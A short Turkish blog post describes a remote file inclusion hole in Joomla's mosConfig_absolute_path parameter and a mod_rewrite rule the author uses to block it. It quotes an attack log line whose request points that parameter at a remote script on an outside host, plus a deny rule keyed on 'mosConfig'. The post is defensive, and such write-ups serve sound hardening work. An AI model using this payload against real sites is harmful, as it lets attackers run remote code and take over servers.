Press enter to see results or esc to cancel.

Joomla ‘daki mosConfig_absolute_path acigi

Selamlar, gecen gun karsilastigim bir acik (veya benim gozden kacirmis oldugum) durumu ile karsilastim. Yapmis oldugu joomla ‘da mosconfig_absolute_patch ‘i kullanarak uzaktaki bir istemciden bir script cagirmak ve sunucu bilgilerini cekmek (disk,ram,cpu, dosya degistirme, silme, ekleme, dizinleri gezme, dizinleri listeleme gibi).  Bu durumu duzeltmek icin ilk aklima gelen php.ini icerisindeki (uzaktaki sunucu ustunden include islemi yaptiran) allow_url_fopen parametresini kapatmakti. Ama kullandigim icin kapatmak pek isime gelmedi ve baska bir cozum olan apache modulu olan mod_rewrite kullanmak idi.

Saldiri log’u

217.172.22.207 – – [15/Feb/2008:02:43:49 +0200] “GET ///////?mosConfig_absolute_path=http://www.xxfs.ru./r.txt?? HTTP/1.1” 200 671 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12”

Mod_rewrite ornek conf ‘u

RewriteEngine on
RewriteCond %{THE_REQUEST} mosConfig
RewriteRule ^/* http://www.murat.ws/ [F]

Sevgiyle.